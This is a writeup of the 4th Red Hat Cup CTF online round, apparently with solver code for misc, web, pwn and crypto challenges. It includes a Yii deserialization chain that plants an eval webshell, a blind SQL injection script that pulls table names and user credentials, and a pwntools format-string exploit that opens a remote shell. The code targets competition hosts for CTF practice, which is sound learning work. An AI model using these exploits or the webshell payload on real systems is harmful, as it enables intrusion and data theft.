第四屆紅帽杯網(wǎng)絡(luò)安全大賽-線上賽Writeup

from binascii import * with open('data2','rb') as f:     f = hexlify(f.read()).decode()     n = 0     color_list = []     for i in range(0,len(f),2):         i = f[i:i+2]         color_list.append(int(i,16))         n += 1         if n == 3:             print(tuple(color_list))             color_list = []         n = 0        else:             continue

PS C:\Users\Administrator\Downloads\colorful_code-1> python .\code.py(0, 0, 0)(0, 0, 192)(0, 255, 255)(0, 255, 0)(255, 192, 255)(255, 192, 192)(192, 192, 255)(192, 192, 0)(255, 0, 255)(255, 0, 0)(192, 0, 0)(192, 0, 192)(255, 255, 255)(255, 255, 0)(255, 255, 192)(0, 192, 0)(0, 192, 192)(192, 255, 255)(192, 255, 192)(0, 0, 255)(20, 20, 20)(21, 21, 21)(22, 22, 22)(23, 23, 23)(24, 24, 24)(25, 25, 25).......(250, 250, 250)(251, 251, 251)(252, 252, 252)(253, 253, 253)(254, 254, 254)(255, 255, 255)

def str2list():  with open('data1.txt') as f:    f = f.read()    index_list = f.split(' ')    return index_list    print(str2list())print(len(str2list()))

# -*- coding:utf-8 -*-# Author: mochu7import PILfrom PIL import Imagefrom binascii import *
def str2list():    with open('data1.txt') as f:        f = f.read()        index_list = f.split(' ')        return index_list
def num2color():    with open('data2','rb') as f:        f = hexlify(f.read()).decode()        n = 0        idx = 0        color_dic = {}        color_list = []        for i in range(0,len(f),2):            i = f[i:i+2]            color_list.append(int(i,16))            n += 1            if n == 3:                color_dic[idx] = tuple(color_list)                color_list = []                n = 0                idx += 1            elif idx == 20:                break    return color_dic
def genimg():    width, height = 37, 191    img = Image.new("RGB",(width,height))    imgpixels = str2list()    colorlist = num2color()    pixlist = []    for pix in imgpixels:        pixlist.append(colorlist[int(pix)])    idx = 0    for w in range(width):        for h in range(height):            img.putpixel([w,h], pixlist[idx])            idx += 1    img.save('flag.png')

if __name__ == '__main__':    # print(len(str2list()))    # print(num2color())    genimg()

flag{88842f20-fb8c-45c9-ae8f-36135b6a0f11}

<?php $link = mysql_connect('localhost', 'root'); ?><html><head>  <title>Hello worldd!</title>  <style>  body {    background-color: white;    text-align: center;    padding: 50px;    font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;  }
  #logo {    margin-bottom: 40px;  }</style></head><body>  <img id="logo" src="logo.png" />  <h1><?php echo "Hello My freind!"; ?></h1>  <?php if($link) { ?>    <h2>I Can't view my php files?!</h2>  <?php } else { ?>    <h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>  <?php } ?></body></html><?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));

$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){  die("you die");}if(strlen($a)>33){  die("nonono.");}fwrite($hack,$a);fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);fclose($hack);?>

/index.php?code=<?=phpinfo();?>

/index.php?r=site/about&message=GET%20/r=site/about&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NzoicGhwaW5mbyI7czoyOiJpZCI7czoxOiIxIjt9aToxO3M6MzoicnVuIjt9fX19

之后測(cè)試的時(shí)候，發(fā)現(xiàn)system、eval之類的一些函數(shù)好像都沒有效果，猜測(cè)可能設(shè)置了disable_functions不過最后發(fā)現(xiàn)assert能用、file_put_contents()也能用<?phpnamespace yii\rest{    class CreateAction{        public $checkAccess;        public $id;

        public function __construct(){            $this->checkAccess = 'assert';            $this->id = 'file_put_contents(\'mochu7.php\',\'<?php eval($_POST[7]);?>\');';        }    }}

namespace Faker{    use yii\rest\CreateAction;

    class Generator{        protected $formatters;

        public function __construct(){            $this->formatters['close'] = [new CreateAction(), 'run'];        }    }}

namespace yii\db{    use Faker\Generator;

    class BatchQueryResult{        private $_dataReader;

        public function __construct(){            $this->_dataReader = new Generator;        }    }}namespace{    echo base64_encode(serialize(new yii\db\BatchQueryResult));}?>

import stringfrom requests import *

allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'

myurl = 'http://eci-2ze8j3xqhbs4y2thbqra.cloudeci1.ichunqiu.com/image.php'

info = ''for i in range(1,50):    for s in allstr:        payload = '?id=if((ascii(mid(database(),{},1))={}),1,5)'.format(i,ord(s))        resp = get(url=myurl+payload)        if len(resp.text) > 4000:             info += s             print(info)

payload = '?id=if((ascii(mid(database(),{},1))={}),1,5)'.format(i,ord(s))

payload = '?id=if(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=\'ctf\'),{},1))={},1,5)'.format(i,ord(s))

payload = '?id=if(ascii(mid((select/**/group_concat(username,password)/**/from/**/ctf.users),{},1))={},1,5)'.format(i,ord(s))

Current_database: ctf
Tables_in_ctf: images，users
Columns_in_users: username,password

from pwn import *

context.log_level = Truecontext.arch = "amd64"

#p = process("./pwn")p = remote("47.105.94.48", 12435)

gadget_addr = [0x4f365, 0x4f3c2, 0x10a45c]

p.recvuntil("> ")payload = b"GET /test HTTP/1.0\nContent-Length:-1\n\n%15$p*%8$p*"p.sendline(payload)base_addr = int(p.recvuntil("*")[:-1], 16) - 0x14a8stack_addr = int(p.recvuntil("*")[:-1], 16) + (0x7fffffffddd8 - 0x7fffffffd830)log.info("base_addr: " + hex(base_addr))log.info("stack_addr: " + hex(stack_addr))

p.recvuntil("> ")payload = b"GET /test HTTP/1.0\nContent-Length:-1\n\n%22$saaaaa" + \    p64(base_addr + 0x201F90)p.sendline(payload)libc_base = u64(p.recv(6).ljust(8, b"\x00")) - 0x110180log.info("libc_base: " + hex(libc_base))gadget_addr = libc_base + 0x10a45clog.info("gadget_addr: " + hex(gadget_addr))

#gdb.attach(p, "b* 0x55555555537d\nb* 0x55555555539c\nb* 0x555555555634")p.recvuntil("> ")payload = b"GET /test HTTP/1.0\nContent-Length:-1\n\n11" + \    fmtstr_payload(0x59, {stack_addr: gadget_addr}, 2, "short")p.sendline(payload)

p.recvuntil("> ")payload =b"getshell"
p.sendline(payload)
p.interactive()

import mathfrom decimal import *import random



getcontext().prec = int(100)

primes = [2]for i in range(3, 90):    f = True    for j in primes:        if i * i < j:            break        if i % j == 0:            f = False            break    if f:        primes.append(i)

keys = []for i in range(len(primes)):    keys.append(Decimal(int(primes[i])).ln())

arr = []for v in keys:    arr.append(int(v * int(16) ** int(64)))

ct = 425985475047781336789963300910446852783032712598571885345660550546372063410589918



def encrypt(res):    h = Decimal(int(0))    for i in range(len(keys)):        h += res[i] * keys[i]

    ct = int(h * int(16)**int(64))    return ct



def f(N):    ln = len(arr)    A = Matrix(ZZ, ln + 1, ln + 1)    for i in range(ln):        A[i, i] = 1        A[i, ln] = arr[i] // N        A[ln, i] = 64

    A[ln, ln] = ct // N

    res = A.LLL()

    for i in range(ln + 1):        flag = True        for j in range(ln):            if -64 <= res[i][j] < 64:                continue            flag = False            break        if flag:            vec = [int(v + 64) for v in res[i][:-1]]            ret = encrypt(vec)            if ret == ct:                print(N, bytes(vec))



for i in range(2, 10000):    print(i)    f(i)